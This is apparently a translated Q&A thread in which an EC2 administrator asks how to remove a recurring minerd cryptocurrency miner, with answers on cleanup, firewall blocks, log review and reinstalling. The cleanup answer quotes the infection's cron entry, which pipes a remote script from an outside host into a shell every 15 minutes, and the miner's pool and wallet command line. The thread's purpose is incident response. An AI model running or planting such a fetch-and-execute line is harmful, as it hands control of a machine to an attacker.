¿Cómo puedo eliminar el malware minerd en una instancia de AWS EC2? [duplicar]

6

Tengo una instancia de AWS EC2 ejecutando RHEL 7.2 que parece haber sido pirateada por un BitCoin CPU Miner. Cuando ejecuto ps -eo pcpu,args --sort=-%cpu | head , muestra que hay un minero de CPU que ocupa más del 90% de la utilización de la CPU.

%CPU COMMAND
99.8 /opt/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:8080 -u 47TS1NQvebb3Feq91MqKdSGCUq18dTEdmfTTrRSGFFC2fK85NRdABwUasUA8EUaiuLiGa6wYtv5aoR8BmjYsDmTx9DQbfRX -p x

También aparece cuando ejecuto top -bn2 |sed -n '7,25'p -

  PID USER      PR  NI    VIRT    RES    SHR S %CPU %MEM     TIME+ COMMAND
21863 root      20   0  237844   3300   1012 S 42.0  0.1   3:49.55 minerd

Sigo intentando eliminar minerd de /opt/ pero sigue girando de nuevo. Anteriormente tenía KHK75NEOiq33 y un directorio yam . Pude eliminarlos pero no minerd .

¿Cómo puedo eliminar esto permanentemente? También he intentado matar el PID individualmente con sudo kill -9 y sudo kill -2 . ¿Hay algún antivirus que pueda usar para deshacerme de él?

EDIT : la pregunta se marcó como un posible duplicado de otra pregunta . Sin embargo, la diferencia es que estoy preguntando por un malware específico. He encontrado la solución a la pregunta, que publicaré a continuación.

    
pregunta Anish Sana 07.07.2016 - 13:29
fuente

3 respuestas

10

Encontré la solución para eliminar minerd . Tuve la suerte de encontrar el secuencia de comandos real que se utilizó para infectar mi servidor. Todo lo que tenía que hacer era eliminar los elementos colocados por este script -

  1. En monkeyoto 's sugerencia , bloqueé todas las comunicaciones con el servidor del grupo de minería de datos: iptables -A INPUT -s xmr.crypto-pool.fr -j DROP y iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP .
  2. Se eliminó el cron */15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh de /var/spool/cron/root y /var/spool/cron/crontabs/root .
  3. Se eliminó el directorio /opt/yam .
  4. Se eliminó /root/.ssh/KHK75NEOiq .
  5. Se eliminaron los archivos /opt/minerd y /opt/KHK75NEOiq33 .
  6. Detuvo el proceso de minerd - pkill minerd .
  7. Detuvo lady - service lady stop .

Ejecuté ps -eo pcpu,args --sort=-%cpu | head , top -bn2 |sed -n '7,25'p y ps aux | grep minerd después de eso y el malware no estaba a la vista.

Todavía tengo que averiguar cómo se logró el acceso al sistema, pero pude desactivarlo de esta manera.

    
respondido por el Anish Sana 07.07.2016 - 20:24
fuente
7

Su primer objetivo es (si no desea volver a instalar) es determinar cómo logró llegar allí en primer lugar. Si el atacante era astuto, debían ejecutar "timestomp" para modificar las fechas de los binarios. Minimizar SSH hace poco si está ejecutando una versión vulnerable de Wordpress, o Joomla, o algo diferente. Por ejemplo, hubo un exploit de Nagios que fue utilizado por alguien para ejecutar Minerd . Entonces, el objetivo ... "Determine qué se está ejecutando, ¿por qué se está ejecutando y es vulnerable?"

En segundo lugar, desea bloquear todas las comunicaciones hacia y desde el servidor del grupo de minería de datos:

iptables -A INPUT -S xmr.crypto-pool.fr -j DROP

Entonces, ¿cómo determinas qué fue modificado / cambiado / vulnerable? Necesitas entender tu sistema. Qué hace, por qué lo hace y quién necesita acceso a él. Buscaría en mis crontabs para ver qué, si algo está empezando. Podría ejecutar: service --status-all para ver qué servicios se están ejecutando / iniciando e investigarlos. / opt / minerd parece ser un archivo, suma de comprobación a ese archivo y puede crear un script para buscar cualquier cosa que llame a ese archivo, o cualquier archivo que coincida, por ejemplo: find / | xargs grep -i minerd o find / | xargs grep -i CHECKSUM_of_MINERD (tenga en cuenta que esto es un brutal forma de buscar dentro de los archivos).

Tercero, revisa tus registros. Si está ejecutando un servidor web, comenzaría con los registros de error (error_logs) y buscaría 403 y 404 múltiples desde una dirección seguida de una conexión exitosa en access_log. Verifique la ruta que se aceptó (por ejemplo, 200: /var/www/nagios_or_something_vulnerable/config.php) y busque dentro del directorio. Existen muchos enfoques para encontrar esta información, pero UN ONE aquí puede darle una respuesta completa, ya que solo podemos inferir información basada en la cantidad limitada de información que publica.

"¡Tengo un archivo llamado minerd comenzando!" Cavar para ese archivo. (%código%). "¡Utiliza esta cadena extraña!" (%código%). "¡Hace una conexión al puerto 8080!" (%código%). "Se está conectando a esta dirección!" ( find /|xargs grep -i minerd ... Ahora tiene una línea de base de cosas que puede hacer.

    
respondido por el munkeyoto 07.07.2016 - 15:04
fuente
5

El problema es que la minerd es probablemente la carga útil de algunos (otros) malware, por lo que realmente no se puede saber qué otra cosa se ha comprometido en el sistema. Es posible que no haya nada más residente en el sistema, y solo te vuelves a infectar cada vez que matas al minero.

Alternativamente, hay algún proceso de administración / dropper que ha abierto una puerta trasera en su servidor.

La apuesta más segura es recrear el servidor. Pero si desea escanearlo, puede obtener Sophos Anti-Virus gratis desde enlace

    
respondido por el Douglas Leeder 07.07.2016 - 14:41
fuente

Lea otras preguntas en las etiquetas